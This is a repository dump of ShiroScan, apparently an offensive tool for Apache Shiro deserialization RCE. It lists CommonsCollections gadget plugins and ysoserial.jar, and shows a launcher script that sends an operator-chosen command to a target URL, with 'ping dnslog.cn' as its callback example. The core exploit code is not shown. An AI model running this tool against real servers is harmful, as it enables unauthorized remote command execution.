https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections8.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections9.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections9.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /moule/ysoserial.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/ysoserial.jar -------------------------------------------------------------------------------- /requirments.txt: -------------------------------------------------------------------------------- 1 | os 2 | base64 3 | uuid 4 | subprocess 5 | requests 6 | sys 7 | re 8 | threadpool 9 | Crypto.Cipher -------------------------------------------------------------------------------- /shiro.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/shiro.txt -------------------------------------------------------------------------------- /shiro_rce.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | import sys 4 | 5 | from moule.main import scripts 6 | 7 | banner=''' 8 | ____ _ _ ____ 9 | / ___|| |__ (_)_ __ ___/ ___| ___ __ _ _ __ 10 | \___ \| '_ \| | '__/ _ \___ \ / __/ _` | '_ \ 11 | ___) | | | | | | | (_) |__) | (_| (_| | | | | 12 | |____/|_| |_|_|_| \___/____/ \___\__,_|_| |_| 13 | 14 | By 斯文 15 | ''' 16 | 17 | 18 | print(banner) 19 | print('Welcome To Shiro反序列化 RCE ! ') 20 | 21 | if __name__ == '__main__': 22 | if len(sys.argv)<2: 23 | print("Usage:"+"python3 shiro.py url command") 24 | print("Usage:"+"若import模块错误,安装不成功,请到linux系统安装运行,或者去python库将crypto首字母改为大写并尝试pip install pycryptodome") 25 | print('Usage:python3 shiro.py http://url.com "ping dnslog.cn" 注意命令用""包起来') 26 | else: 27 | url = sys.argv[1] 28 | command = sys.argv[2] 29 | scripts(url, command) 30 | 31 | --------------------------------------------------------------------------------